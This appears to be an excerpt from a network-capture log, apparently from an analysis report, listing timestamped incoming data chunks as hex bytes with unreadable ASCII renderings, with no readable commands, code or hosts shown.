2021-10-13 13:52:00 UTC	380	IN	Data Raw: de 98 07 97 53 d7 0f 78 79 8e 95 4d ff fb b4 02 08 69 18 60 fa d8 e8 a2 a7 02 7d f0 ba 69 f5 e6 d5 68 da 2a 57 0b 9c d6 6e 09 f7 cf 38 a5 b4 ff 75 32 ef 54 67 e5 c4 86 96 a5 50 66 37 22 32 35 32 e0 68 bb 69 8a 92 28 94 31 80 54 a8 4a 89 0c 97 1e 7d 42 2b e6 26 87 9c 73 0e b7 6e 0c b4 0a bb e1 10 68 91 43 6b d7 43 7b 25 90 be fe 6f 69 81 69 31 69 e9 b9 c4 7a 0f b8 b5 2b c4 1c 0e 35 5b 4b 74 73 6f 65 a9 1c fe de e6 b2 f1 17 05 b1 e7 b6 7f 9e f0 e6 e1 eb ad ba 6f b7 0e f3 bd 93 07 17 6f 72 72 03 cc 8e ec 5c 43 57 d2 2c f2 5c 68 4f 5a 35 12 21 91 e1 91 89 e2 85 82 e5 3d 92 82 a3 c8 99 67 7d ac 32 ef 41 8b a5 6a f3 5c e5 87 ed 5c e5 f3 3b c6 48 6d e7 82 5a e5 7b 94 88 f0 4a 90 18 b4 41 3b 52 f1 73 65 af 6c 40 aa d6 61 36 a8 57 fd 93 c5 86 2d 18 b4 d9 51 64 fe Data Ascii: SxyMi`}ih*Wn8u2TgPf7"252hi(1TJ}B+&snhCkC{%oii1iz+5[Ktsoeoorr\CW,\hOZ5!=g}2Aj\\;HmZ{JA;Rsel@a6W-Qd
2021-10-13 13:52:00 UTC	381	IN	Data Raw: 05 f4 6a 72 3b f1 de 96 dc 3d e1 72 11 92 3b 9e 2c 87 5f e5 b6 7c af 6c 20 ec be 76 f1 6c db ad 78 ad 92 17 42 69 21 3c dd b2 f6 27 48 4b 60 30 58 19 41 7a 60 f6 ad 76 7f 91 92 4c d2 0d e1 62 4f 56 41 1e 32 41 4d ac 75 fd e7 79 fe 35 c0 c8 4f 94 cd 12 b1 7a 18 e1 7a 05 e1 6c 3e 4d 13 bb 15 c9 35 aa d6 64 44 6f ad 8a 4f e5 1a a0 f7 f0 a3 42 91 88 7e eb 87 83 2c 24 f7 9b 8e b1 00 b1 9e 44 59 03 8b dd a2 27 ac 13 58 eb 4d 51 65 49 f6 0c e3 9e 01 24 7a 7b 3c 4d 62 c1 a8 c4 ef 10 ff 4b 5e 3c df fd 29 fa d3 4a f4 93 ff c9 84 49 89 0b 81 ac 35 79 35 d2 f0 bb 04 12 e5 56 5f 04 b6 57 7f e2 8b b5 51 98 03 bf 34 d7 f1 d7 a4 51 72 20 3a 61 49 0c bc 21 c4 8c 59 5f ca 7d d0 26 6f 18 69 75 8c 02 0f 92 de 00 6c 17 21 2e 6d 57 26 38 89 ca 2a 24 d4 6b 13 5c 71 17 91 d4 da Data Ascii: jr;=r;,_\|l vlxBi!<'HK`0XAz`vLbOVA2AMuy5Ozzl>M5dDoOB~,$DY'XMQeI$z{<MbK^<)JI5y5V_WQ4Qr :aI!Y_}&oiul!.mW&8*$k\q
2021-10-13 13:52:00 UTC	383	IN	Data Raw: 9d 07 40 5e 65 45 b7 a7 5d cb 07 0c 9f bd fc c3 e1 d9 d8 b1 17 78 0c 0d e0 e4 34 ae 64 93 57 29 bd ed 9e 37 d4 23 dc 42 06 eb 49 71 c2 3e 6d b6 18 b2 f1 ca 6a 15 6d 9c 50 29 17 fd b1 90 47 5d cb 89 56 0a 44 1a 93 ed 7d 2c b3 68 be 38 31 84 32 74 c7 07 f3 a1 fa 1b f5 3f 8c 3c ad 20 80 b0 e0 51 3c aa e2 70 b2 59 70 50 44 f1 95 cb f6 dd 51 5c e9 e9 48 ca e5 72 e6 4d 5c 97 18 32 54 c7 fd d3 a3 69 63 72 a7 be 59 65 d4 ef a8 83 49 53 74 e7 32 03 c9 17 21 76 40 89 c2 8e af be 1e 91 29 64 c8 50 18 48 01 b7 3c 8b 64 ef 00 42 55 da 7b ce 46 ca fe 7c 8a e9 86 e6 d3 6a 55 da 21 7b 49 4a 71 33 a4 82 a3 1e 37 59 42 d5 3d 7b d9 ce 60 6c 48 9d a1 51 4f 79 5e 14 64 15 f5 a3 22 6f fb c0 1b 70 2f 42 f0 01 b0 32 c3 7e 5a 7d 0a d5 81 99 c2 a6 c0 51 1d d2 05 b4 a1 04 38 d7 a4 Data Ascii: @^eE]x4dW)7#BIq>mjmP)G]VD},h812t?< Q<pYpPDQ\HrM\2TicrYeISt2!v@)dPH<dBU{F\|jU!{IJq37YB={`lHQOy^d"op/B2~Z}Q8
2021-10-13 13:52:00 UTC	384	IN	Data Raw: 1a 23 17 2e bf 06 1b 15 d7 cf 9c c0 5f af 7d d2 57 57 0e dd 4a 6d aa be 37 1f c7 0d a2 61 d8 07 09 fa 46 07 35 fb d7 0f f8 18 d3 22 f1 67 d9 1c b5 e7 aa 85 18 52 bf 27 0e 4f d6 1b 5b 57 e8 9a 2a c7 37 84 24 1f 00 78 05 90 06 73 73 d0 55 61 66 09 8a 2b 53 60 bb 1c 81 96 26 2d 03 25 7b 5e 5d 0f e0 68 6e fa bd d1 fe 4a 34 80 54 f8 b3 4d 1e 77 f4 83 13 9d d0 34 4e 92 35 2b 4f 91 e4 f4 2b af e0 43 bb 04 31 4a d7 c0 ca 18 9e f9 c2 50 e4 3c c1 9a 7e cf 65 0f 51 7f a6 1a 97 d5 9f 9c b1 03 97 e7 90 7b 00 ef ce bc 1a c1 14 6b bb d2 b1 8d 30 e8 09 c7 ee 4d d3 6c 2c 32 74 58 bb 31 89 48 c4 78 4c e8 ab db ca 2d de fd 0c 07 7c 7f cf 68 b3 94 0a b3 b5 ab e9 8b a5 e3 d3 3d 26 ca 34 ac f4 0f 92 ba 90 51 cd 17 11 63 0e 9c f4 a3 99 bc 0e 31 ff 6b 23 4b 92 a1 57 6f 4d 9b f6 Data Ascii: #._}WWJm7aF5"gR'O[W*7$xssUaf+S`&-%{^]hnJ4TMw4N5+O+C1JP<~eQ{k0Ml,2tX1HxL-\|h=&4Qc1k#KWoM
2021-10-13 13:52:00 UTC	385	IN	Data Raw: c1 40 f9 b4 36 4b b1 47 f4 22 c0 b7 10 52 52 b0 3a 2d 3f 0f 04 5b bc ff e8 1a 3b 0f af 04 d1 d6 b1 97 23 86 c2 6f 19 31 a2 18 2d 67 b6 1d c7 d3 10 2b 84 5f 66 fb 29 d6 44 b1 f9 34 31 52 69 4d 20 d2 f3 a8 2c fc c8 38 8b dd 39 30 1b cb 53 a0 a1 2c 4b a9 32 5e 19 d7 35 ce ae 7f f0 d4 4a f6 e9 52 53 be e1 25 1a 95 c9 71 7e 27 83 77 2e 17 c9 4c 43 cc 02 3a 41 38 35 71 b1 8a 08 68 1a 1a b5 3e cf 87 51 18 61 04 58 6d 09 38 f0 78 33 37 b5 2a 6e d4 01 56 ae 0e a7 69 34 90 fe 9a 4e b8 c7 a3 7c 59 78 f4 7d f4 8e eb ef e0 eb 27 49 e8 8f f3 00 70 ef 9e 1b 75 95 fb 18 6a e9 31 a1 1d ce fd 4b 0d ef 94 f0 14 26 1f 68 63 0e df cb d2 a1 86 27 ea a8 33 63 2d b1 8c f9 c8 47 84 cc 8c ac d0 41 f4 32 47 26 ee 95 20 84 22 d8 f0 11 dd 5d f9 2c b5 2c 8c 68 2a 08 bf 01 02 9e 95 23 Data Ascii: @6KG"RR:-?[;#o1-g+_f)D41RiM ,890S,K2^5JRS%q~'w.LC:A85qh>QaXm8x37nVi4N\|Yx}'Ipuj1K&hc'3c-GA2G& "],,h#
2021-10-13 13:52:00 UTC	387	IN	Data Raw: 4e f0 d9 ae c9 27 c8 00 0c 22 b7 fa 93 93 0f bb ac 3e c5 70 3b e4 14 f5 df 1f 54 d1 e1 2a f2 fe 26 20 02 23 41 2d ce c2 24 4e f8 8a be 98 c1 c7 27 8f c4 53 c4 bd 71 76 23 4a 85 9c 2f 5c 80 03 b1 7e de d4 3f 50 68 dc 43 30 25 2c ae 1a 7b 84 71 bb bf f0 bc 66 2d 3e 33 92 36 62 93 65 e6 70 c1 53 7d 6d fb 66 16 cf ad 74 ad f1 08 b5 bd f1 a1 69 af 61 a0 dc 2f 56 94 b0 cb c1 37 66 a2 12 54 1e a6 b6 df 9d 34 8a ee 75 29 8b b0 d9 e2 8e a3 e0 d6 54 59 0c f7 e0 41 1f 42 a6 dd a0 11 73 17 3c 1e 5d e3 39 a2 dc 79 a4 ef 84 3f 75 4a b5 d8 27 49 e2 05 44 0c fc d3 fd e9 fc d5 2b 7a 0a 9e 22 f7 8e 42 d8 70 0b 9a f6 b4 73 eb 2b 72 9b 18 6c 65 46 53 54 77 c3 df 94 7b d7 14 92 b5 32 2f 01 bb 8e cb e3 e2 fb ee 97 21 a9 37 f2 f1 a1 b7 6a b4 a2 ab ad 69 90 8d 50 d1 63 73 f4 50 Data Ascii: N'">p;T*& #A-$N'Sqv#J/\~?PhC0%,{qf->36bepS}mftia/V7fT4u)TYABs<]9y?uJ'ID+z"Bps+rleFSTw{2/!7jiPcsP
2021-10-13 13:52:00 UTC	388	IN	Data Raw: fa 18 c2 63 dd a7 69 83 44 91 27 66 1e fa c0 3e 3f 68 07 75 b3 b8 55 9f 1a 1d d1 d9 4e ea 30 94 d2 d2 00 fd dd 2a b3 66 ed d5 04 bc 06 99 aa fd 63 ab 59 21 a2 ac a6 03 20 ee 3c 23 81 4d ca 85 fb 7f 4a 5a 78 6f ac 28 ce b7 25 5e c2 da ec e6 c1 26 3a b5 a7 4f a6 34 00 b6 13 cf 0b 8b df bd e1 2f 15 6d d9 2c 28 df d5 af 3e c1 50 e4 33 55 b7 2d 6b b5 11 a4 1c 8e 81 7a 1b b2 3b aa 8b 36 39 22 fb e2 e1 a8 ca 32 17 b8 1b 4e 7c df 09 cc f4 d5 9d 68 d7 eb d9 d2 45 0d 4c 7f 78 b1 b2 1c 17 d2 b9 55 de 40 7d 8e 95 16 08 bd b8 a1 68 56 cc ff b3 1a 99 6a 9f 67 fb da 25 a3 f7 64 5e 67 ff 90 0c bd 9b af 87 e3 9a 67 b4 0c fe 93 88 01 6c 0d 10 77 d2 ea 52 65 e7 ff f2 b4 6a b4 f0 ff b7 02 e3 1f 24 31 c5 e8 3f ce 56 8d c8 11 ea bd b6 ca 94 c2 5f 49 2e 73 4a 54 a3 24 18 b9 da Data Ascii: ciD'f>?huUN0*fcY! <#MJZxo(%^&:O4/m,(>P3U-kz;69"2N\|hELxU@}hVjg%d^gglwRej$1?V_I.sJT$
2021-10-13 13:52:00 UTC	389	IN	Data Raw: c3 1c 09 a8 ed ae 96 55 a3 9e 9d 6d e9 d3 61 dc 7b a6 df 7e a2 e6 3b 0c f8 74 87 fe a2 82 f5 c4 97 89 6a 62 5b 79 e2 a6 b7 0c 62 80 0a 66 65 c5 dd 10 f4 c1 f0 c7 df ec 45 ef ea 6c 7b 07 d3 b7 89 8e ca b8 69 9e c6 0e 21 2d 21 17 df b5 90 af c4 09 f1 b9 62 a5 7f fe d6 b8 3b 41 40 36 3a 79 67 e9 3d ef 3d ba 55 60 f7 3d df fe 36 9b 3c fc b7 64 0d 4f af 76 1f 41 ad 0a 44 8e fc c6 e7 ca 6b aa 28 a9 be 15 d6 94 1d 6a f0 2e d8 84 88 7f 28 52 18 ab b7 96 c5 f8 f7 79 3b 1c 9d cf ed 42 be 17 02 53 d1 4c 69 28 09 00 92 f6 74 b1 d3 ad bb be 63 c2 e7 32 65 22 d8 70 b9 a6 9e 76 34 be 76 e9 74 60 b1 b0 40 3e ca f8 51 32 7a 98 03 8e 6d 68 e9 a2 4c e9 74 eb ca b6 b8 3d 1e fa 4f 64 43 e7 d1 8c db cd e0 7a e3 5c b0 81 4f c3 5a b3 7b b6 1c 3a d9 9b f8 f9 a4 fe 8c 85 f3 03 f7 Data Ascii: Uma{~;tjb[ybfeEl{i!-!b;A@6:yg==U`=6<dOvADk(j.(Ry;BSLi(tc2e"pv4vt`@>Q2zmhLt=OdCz\OZ{:
2021-10-13 13:52:00 UTC	390	IN	Data Raw: c8 68 fc f4 9d 66 0b cf b2 5e a7 e3 85 fc eb c5 b6 d2 c6 c8 61 d1 0e 17 91 9a 1e eb 42 6b ee 5d 38 1f 72 9f 31 8f a8 0d 98 5d 19 7e fb 02 68 14 38 f2 5a 18 d3 26 52 bb 15 9a f6 95 18 e6 2c e3 57 9a 30 d4 d5 bd 7b 30 73 73 43 61 d1 82 a0 78 5c ce e2 27 53 9a b6 3b fc ff f7 1a 92 72 b5 24 39 46 08 b3 35 eb cd c7 ec d0 a5 f0 9d 3b 79 3e 73 d9 cf ff f8 3c 98 2c 47 85 df 18 26 3b 60 ee bb a3 9e ce 45 eb 7e b7 6d 57 f6 53 73 ba ad b3 f6 58 2a db a2 3f ed a1 fa 90 3a 9b 06 59 45 e3 0d c9 14 24 f2 cf 4e a6 d9 8f ef d8 f1 8f 2e 9f 6a ce e4 28 dd 47 81 b0 d7 bf 9d 93 9b 01 78 46 6e ef e9 aa d7 eb ec b4 fa f8 55 9b 15 5a ba 4c c0 77 70 89 19 b2 f2 86 5d 64 16 55 c0 3a b5 24 36 59 18 79 b6 ff 7a df 63 dd 2c f4 03 f4 73 b4 9d 81 f3 4d c5 3c fc fd c0 fe 4f d7 a3 15 e0 Data Ascii: hf^aBk]8r1]~h8Z&R,W0{0ssCax\'S;r$9F5;y>s<,G&;`E~mWSsX*?:YE$N.j(GxFnUZLwp]dU:$6Yyzc,sM<O
2021-10-13 13:52:00 UTC	392	IN	Data Raw: ca 27 07 66 2d b4 cc de 7d f6 b3 78 4c 5c 06 3a 22 a6 1f 70 d7 5f 20 9c 0e de c8 c2 d8 c2 07 8f d6 a4 65 60 bd 05 d8 5a 7d 4f 69 55 11 e5 22 b1 b0 dc 8f 77 d7 b0 30 94 16 2d 27 22 70 0c dd 36 6c 7d 0d e7 45 c7 a5 78 4b 9e 19 7d 12 97 b7 f0 ff 17 5f 51 35 b9 24 db 89 20 d3 42 3f 07 13 a9 25 f8 83 8f 2f f9 99 52 d7 8c bc 2f 56 a9 e7 b5 da da a9 b1 71 fc 6a 54 bd 4d 4e 4a b3 ad 99 ad 17 e6 be b1 e1 4f 99 27 a9 6f bb 16 07 72 25 50 a1 b5 99 f6 84 62 b3 1e fa 3b d7 1b 73 dd 24 df 33 a6 e2 32 88 6c ec 3e b9 df c5 72 c8 7f ab a8 4a 49 0e 3b 09 8b 03 19 10 cd 5b e1 d9 7e 0d 61 b4 4b 76 52 db 9c 80 83 f2 ae e3 45 7f 4d 5c f5 c7 8c b5 d4 5b cf 97 16 b9 42 5d 79 7c ba 9e 5e da 08 3b 7f 16 fa 32 7b 6b ef 1c fb cc 82 1c d8 70 8a ec 4e 3e b9 fd 50 11 4d 51 db d0 6c b6 Data Ascii: 'f-}xL\:"p_ e`Z}OiU"w0-'"p6l}ExK}_Q5$ B?%/R/VqjTMNJO'or%Pb;s$32l>rJI;[~aKvREM\[B]y\|^;2{kpN>PMQl
2021-10-13 13:52:00 UTC	393	IN	Data Raw: 92 3d f7 88 7f 51 a8 b6 d7 05 d6 30 2b 78 ba 69 8d 8c 4a e6 79 a5 16 68 3c 65 57 bd 8c a3 4a 8e a5 68 3a c0 b5 1f 96 46 e9 d9 a1 6d a8 63 93 21 1b 75 d3 d8 0a 6f 2b 3e b0 e8 0a 0a da 5d 7d 6c 0d 9a 0d a1 d8 1a da 50 55 cb a0 32 4b f0 5d 62 89 25 f4 82 46 0b 0e d7 a4 f1 65 bf 0e 0f ae 08 0a f4 b4 02 ad d5 f7 c5 fe 5a 97 18 2d e4 f9 40 6f b0 bb 1e 0e 6d 5d 37 39 53 84 a2 37 fa b2 f1 44 e3 a3 fd 5b 92 c6 46 30 7c f8 54 01 38 a2 0b 8a 30 63 80 02 a1 3a d7 d9 00 7e ed ad 7d 87 e1 f2 3c 6d 92 aa ca 16 e3 c4 e7 d9 4b f3 72 97 25 20 b3 02 26 93 e2 49 7f eb 33 a9 5b 14 00 00 e5 4f a5 ba ad cf 88 49 d6 3f 0f 21 89 08 f6 c4 18 a8 17 f2 ee 29 49 c5 ca 9d 10 e0 e0 95 90 1a 40 10 81 a4 95 ad 1a 32 39 dd 3d 8c ff 1b 08 44 f5 c2 ad fc 9d 55 38 9d 5a 9c 1d a3 0e 8d be 5b Data Ascii: =Q0+xiJyh<eWJh:Fmc!uo+>]}lPU2K]b%FeZ-@om]79S7D[F0\|T80c:~}<mKr% &I3[OI?!)I@29=DU8Z[
2021-10-13 13:52:00 UTC	394	IN	Data Raw: e4 cc 9d 38 ab 55 af ee b2 8a 46 8e e6 c2 7d 82 4b bf 9e e7 7c 8f 5c a4 a7 ba df 29 46 d7 e9 7a 0a fe 75 b7 a7 da ed 1e c3 29 5f a7 0b 04 3c 49 2a be 5c 21 0c 1c 15 43 ae c2 10 11 17 03 d6 96 78 66 05 06 1f da 88 23 4b b1 df 9a 32 55 97 89 26 b1 ac 36 9b a2 33 d7 39 c4 32 98 67 e7 4a 24 7a 5b 9a 0d da e5 51 2a ce bc a1 4d d7 de c8 22 d6 b5 8a 16 77 02 97 03 9e 18 33 a2 12 ba 37 d9 c3 b3 fc 7c d5 d0 d0 d0 77 d9 1b f1 f6 24 9d a0 c0 6e e4 44 e8 f0 d5 66 a0 74 54 02 d7 54 31 bf f0 17 c1 65 17 6d fb b5 3a 34 25 b5 d4 51 47 f4 c4 ba c6 35 76 7c 4c 0a 79 fa 90 3b 8e f3 21 06 4b 49 61 e3 af 34 1b 0a af d0 54 f3 7e 85 95 f0 98 ed 08 e6 1a 54 ef d4 71 16 35 0a 50 ff 8b 28 47 46 af 49 49 5e 1c 6f c2 ff 91 1c 93 16 d3 cf 4d 38 c8 fa e4 f5 79 c6 e3 21 b4 08 0a 03 2a Data Ascii: 8UF}K\|\)Fzu)_<I\!Cxf#K2U&6392gJ$z[QM"w37\|w$nDftTT1em:4%QG5v\|Ly;!KIa4T~Tq5P(GFII^oM8y!*
2021-10-13 13:52:00 UTC	395	IN	Data Raw: 65 91 d2 a1 4c 33 00 9c b4 99 e1 9c e1 05 3b 08 75 4f 39 47 65 7a 6b 8f 9f 89 9d da 7a 87 27 cf f1 57 68 8e 97 55 47 c1 a2 42 76 41 cf 37 a6 8e fa 97 f5 05 2c 31 1e fb 30 23 0d bd 34 54 b0 0f 57 08 05 3e 64 bc 60 ac 33 7a 4f e2 41 94 c5 75 0b 83 ec 93 8c a3 02 47 b8 54 46 b8 f6 26 8f a9 4d 15 e5 21 c0 7a 3d d1 3e dc 12 d4 f9 cc 4f dc d2 e2 12 2a c2 7a 3f 5f 8f d2 ab 64 49 14 52 5d be 27 84 b8 d6 98 9e ca d8 32 52 bb a5 04 fd 0f 49 c5 51 77 a7 c9 ee 8d 1a e5 18 c5 f4 bf c4 f3 55 e8 19 b8 5c 1d d2 fa 62 a6 99 53 b5 06 06 2f 80 a4 b4 99 f6 57 64 be be c6 93 b5 56 4e 2b 74 37 2d e6 6e bf 9a 94 12 c1 e8 34 c9 17 4b 7c ab 07 2f 10 04 6a e1 e8 6d 95 85 c2 f0 e6 74 99 48 c3 0c 18 d7 ba e1 29 fe 0e f4 68 28 3f 40 5f 15 2e 62 84 15 3c 91 75 ca 16 32 0f 62 34 a3 6b Data Ascii: eL3;uO9Gezkz'WhUGBvA7,10#4TW>d`3zOAuGTF&M!z=>O*z?_dIR]'2RIQwU\bS/WdVN+t7-n4K\|/jmtH)h(?@_.b<u2b4k
2021-10-13 13:52:00 UTC	396	IN	Data Raw: 84 06 e4 96 e5 be b9 15 2a 3b 55 29 85 8d d7 95 63 ae 7c 07 90 17 87 19 5d 4a 9b 72 38 2f 94 5a 52 d2 78 ad 10 04 a1 ec 4c 51 25 a3 df b1 7a 5a ed a7 44 e0 cc 84 fb e9 a2 e3 cc 20 cc 25 f4 4d b2 1e fa df 4d 0e cc 3a ce 2a 46 e0 7a 6e 71 ff ae b8 81 a7 34 7b b6 8e 0b ad a8 7f bb 5d 7d 8c 85 65 43 db 05 70 2e 26 33 7f 12 4f cb 51 53 5b 55 a1 38 74 17 51 d8 1d 91 c9 15 d8 de 6f 16 b0 96 fb cd c3 cb 22 0d cb 6c 01 bd ab 47 16 fd fc 0b cb d7 8f 22 8b 45 66 e5 dc 2b 9c cf 79 7d 9c d0 34 a0 3b a0 50 16 c9 bf 2d 0e 24 ee 61 2e 54 c9 9c 38 ca cc 4e 6e ff 94 63 36 c0 91 39 df 65 7b 41 5a ea ad d4 a6 25 56 59 fe ce fd ad b0 fb 8e 9b fa 24 2b db 65 fd 12 28 97 8b 91 45 a7 90 53 38 92 36 c1 c4 5a 4b 1a 32 0d bd b3 aa fb c4 86 1b a3 c1 88 c8 d2 e6 0b 4f 11 68 ed bd 7d Data Ascii: ;U)c\|]Jr8/ZRxLQ%zZD %MM:Fznq4{]}eCp.&3OQS[U8tQo"lG"Ef+y}4;P-$a.T8Nnc69e{AZ%VY$+e(ES86ZK2Oh}
2021-10-13 13:52:00 UTC	397	IN	Data Raw: 4f 02 85 ae 5c bb c9 f7 22 21 f3 14 f0 8e 35 63 cd d3 89 ad 5b e5 89 12 ac 6b 11 46 79 65 b5 eb 22 9b e3 d6 46 46 ff f1 a0 4a 68 85 4a fb 05 5c 9d 9f 23 a5 db 4a 25 71 a1 84 67 4f 08 55 c4 1a 62 02 79 f8 e8 f6 48 b2 34 20 80 c2 6c 84 fc 0d de 64 a5 a8 97 79 be a8 30 cd 3c c6 f4 e9 89 f1 53 cf 60 88 17 72 60 0a 6e 18 56 b3 6c a6 2d 42 0d 72 4a 70 1a cb 82 4a d7 1c f8 c5 72 11 4b 5c 33 35 7b 41 d9 dc e4 01 05 e4 91 d8 66 0f 13 de 38 87 de a1 82 f5 e2 5e 8c d2 2e 5b 55 e1 a6 b7 71 22 c1 34 d4 29 15 08 b1 86 36 f3 78 60 fd f7 bd 9b a5 7b 07 7e 6b 0b 51 fd 7f 6f 6e 35 99 87 71 20 bc 8e 72 7f 97 53 14 14 cb 54 0d ee d8 53 84 47 7a bb 26 f9 ff 3b 78 50 eb 45 45 aa a3 33 28 58 f9 c7 d6 48 14 c5 2a f1 1b fb 4e 4a 56 0c 4d ba 89 f4 cf b6 86 0b bb 14 06 10 ed 10 66 Data Ascii: O\"!5c[kFye"FFJhJ\#J%qgOUbyH4 ldy0<S`r`nVl-BrJpJrK\35{Af8^.[Uq"4)6x`{~kQon5q rSTSGz&;xPEE3(XH*NJVMf
2021-10-13 13:52:00 UTC	399	IN	Data Raw: 7e 63 ce 89 c8 a0 3b e3 ce 1f 97 bc d6 80 ba 40 92 59 81 d9 44 82 04 0a 95 1e e8 19 4f 46 a8 29 fa 74 0c 22 91 69 89 25 46 1e bc d2 0e 34 62 87 96 57 c1 ec 81 75 f3 20 08 14 0c 99 92 b0 0f 51 f4 a5 37 9c 29 60 0b 38 c7 ba f5 fa 7b 69 2f cf b4 5a 85 49 83 fb e2 24 8d 4f d3 ea ff be 5a f4 d7 72 6f 34 41 1b 61 ef 16 92 90 06 47 df c1 1c 1e 37 4e d9 97 7c 83 37 e2 e7 f1 22 27 94 3c f6 d2 2a e3 79 2a 49 84 dd 12 45 c8 14 58 d9 51 cd 10 77 ea 9a 1e f2 a0 99 bc 7c 5c 25 7b dc b4 94 c0 b4 98 a5 1a 90 9b f4 ac c2 64 d4 37 71 5a 04 85 65 98 64 dd 8f a2 93 96 4e 72 57 52 84 1b 3c c9 45 fc e6 40 0d 35 6f 99 0a 5b b1 3b 14 90 2f 31 a0 91 f3 a2 5c ff 38 46 a6 15 89 b2 c2 4b 31 a7 07 84 8e ee 36 6b fa 4e 4b 06 7b bf 66 2d ba e9 5a 0c 47 2d 5c 6a 44 29 4d 0b 65 91 37 73 Data Ascii: ~c;@YDOF)t"i%F4bWu Q7)`8{i/ZI$OZro4AaG7N\|7"'<yIEXQw\|\%{d7qZedNrWR<E@5o[;/1\8FK16kNK{f-ZG-\jD)Me7s
2021-10-13 13:52:00 UTC	400	IN	Data Raw: bb ba 26 9c bb 6b 67 73 6b ab be e1 32 c8 f1 52 8a 2d cf 60 94 70 38 c0 ce 78 b1 3a 36 08 8a b2 2f 09 8b 62 53 4c a9 ef 80 44 c9 de a7 4b 80 5c 6d 59 e1 f1 f9 ed aa 2e 0e 17 65 cd 9a 08 fe 3d 2e b9 f3 f9 b7 41 89 7f fc db 9d 77 c5 06 5f 07 c4 13 0a ec cf d0 95 04 16 37 8e 9a db 89 ea 99 f3 31 e1 05 33 89 29 9c 76 cd fa b5 1f 85 76 71 f4 ae 2f 53 37 b2 f9 49 e3 61 d5 fe 31 7b 95 6a dd 06 0c 43 3c 8b 13 67 a6 56 2f 0b 4f c7 d8 4f 88 55 68 aa 74 17 b6 1c af e4 73 52 60 c2 9e 7a 4f e2 92 38 99 23 e3 b6 5e 93 e6 28 1d ec 01 3d d3 e3 2e a5 4b 6e 58 5b 30 0d a8 3d c6 a5 68 90 93 f8 7d 44 c7 35 af 94 16 0f 85 19 8b 06 85 d2 28 f2 03 79 51 ea 65 5b 7a 74 de b3 de 12 2e 63 0f 0c 3f 50 2b 50 30 2e c8 41 99 b5 2e 02 db cf 4e 89 9e e6 64 7b 56 e9 19 ee d7 33 85 27 57 Data Ascii: &kgsk2R-`p8x:6/bSLDK\mY.e=.Aw_713)vvq/S7Ia1{jC<gV/OOUhtsR`zO8#^(=.KnX[0=h}D5(yQe[zt.c?P+P0.A.Nd{V3'W
2021-10-13 13:52:00 UTC	401	IN	Data Raw: 52 a3 c0 7f ed 20 44 29 a8 ec af 9d c1 26 02 60 fd 2b 82 f2 b9 38 ba 53 d0 28 2f a4 87 b0 05 40 09 cb 87 71 55 c5 c1 7d 97 bc 34 24 5f 82 8b e4 c8 7f 78 3c 6b dd 97 73 1a 29 54 8f 0b 32 66 b0 2e dd 64 8b a3 d1 f2 f3 a1 e3 c8 0e 90 98 70 db 4b a9 d2 57 f4 b3 2c 04 b0 2a 87 42 b7 f3 aa 51 48 6e f4 f2 c2 ae 04 00 2d bc a6 f1 38 48 01 b1 ff 9f d1 a2 f8 91 c6 85 87 e1 44 39 ba c2 b6 d7 9d cd cf b6 ae 22 b8 11 9b 44 1b 35 0c 3f 4a 3d 42 b4 6e c9 5e 85 96 e6 6a d7 3c e4 fa 1d 1a c2 1f 69 eb ab 65 94 21 1b 73 38 c0 be 5d a6 11 0c ef 5b a6 00 5d 7d 5d d7 81 21 c6 58 21 ae 9e 9d 5c c9 e2 cf b1 f3 5b 02 58 6b 58 68 e7 7e 61 53 85 a3 e9 e4 ba f8 2c 00 78 b4 78 bf e3 24 37 f0 de 15 72 29 69 fc cd a9 3b f6 5f 08 cb a3 df 06 53 84 96 56 8d ac 7a 39 ac a8 78 a3 c2 45 29 Data Ascii: R D)&`+8S(/@qU}4$_x<ks)T2f.dpKW,*BQHn-8HD9"D5?J=Bn^j<ie!s8][]}]!X!\[XkXh~aS,xx$7r)i;_SVz9xE)
2021-10-13 13:52:00 UTC	403	IN	Data Raw: b1 72 3e 42 78 db 7d e1 13 28 97 88 2f 34 a6 43 ac 4a 8b f6 dd c5 5a 4b c9 1e ed 37 5b e3 bc 98 86 96 26 47 76 ba ba 5a 4f 32 e0 0e 64 b2 fc aa bd 6d cc d2 d9 7d 3f f9 09 95 b1 6a 21 c2 10 40 83 94 73 0e b7 6e 67 d8 61 eb 09 f0 58 83 71 d0 8b c0 bf 35 73 f7 1e 35 1c c1 6e 33 fc 16 bf 88 fd 5e 28 ba cc 58 12 0c 94 d0 b8 43 12 7a b0 ef 9f b2 43 f1 e8 83 fb 07 b5 8c b3 2c 46 45 2e 67 03 33 18 6f dd 86 58 68 bf 62 41 6f f9 94 c1 dc bc 22 a2 11 d9 8d 90 d5 c8 1d 5f c4 12 ed 76 4e 4d 5f a5 b3 08 58 4e 28 ca 53 f3 9b fc 83 50 51 cd 43 f9 28 d6 5b f2 d1 32 43 f3 8b a8 01 0f 41 c4 28 42 2f 4d 53 c8 17 b1 2f fa d3 ec e1 83 1b 43 72 9a 67 e7 19 f4 ac d5 c1 c0 57 a8 28 bb 31 f2 af a6 cf 85 41 67 3e 4c f3 84 a4 6b c4 9f ce 5a 33 f2 1c 33 27 0d 55 2f 5c 1e 67 23 39 54 Data Ascii: r>Bx}(/4CJZK7[&GvZO2dm}?j!@sngaXq5s5n3^(XCzC,FE.g3oXhbAo"_vNM_XN(SPQC([2CA(B/MS/CrgW(1Ag>LkZ33'U/\g#9T
2021-10-13 13:52:00 UTC	404	IN	Data Raw: 6c 51 0a bf 76 f9 fd 0b ab 78 d7 89 c8 ef d0 a7 b1 90 95 e2 b5 c3 55 a0 09 b3 4a a9 32 5e 19 d7 35 cf ae 7f 8a 11 67 ee 8c d7 3c 41 93 8f 75 41 c7 75 2e 71 bc 32 9c 39 43 0a 6c f5 87 c2 05 08 6a 2f e1 58 bc 68 1a c2 2c e1 cf 84 a9 78 b9 64 aa db 09 8b 72 57 e5 a5 f2 03 ff db 77 0d 84 70 b8 69 9f 9f 46 65 2e bb 76 d1 2a 1a 9b 46 ba 39 51 25 66 50 30 29 c4 ad f8 46 37 bb 9d 04 0b a7 8d 3d 4d e1 05 77 08 91 c8 fd 4b 5e 51 16 31 1c 71 1d 6a 6f 81 1f b2 83 7a 23 55 60 4d e5 fd aa cf 8f 2d 81 16 4f 57 dd 6f 2b 13 8b 31 25 b9 89 48 37 99 80 d7 74 9c 89 a1 ab 3b bd 12 60 db 54 7a 4f ea c0 bc a6 e3 66 19 3b 0b 4c 77 11 f3 ca 47 5a 68 cb 7b 4c e8 ec 92 d3 b0 57 ad 47 49 b8 1b 15 5c 22 cf 9a 53 f8 cd e9 6c 12 ca 76 74 01 17 ab 36 1f aa e0 a0 cc 95 85 2b 8f a1 49 d4 Data Ascii: 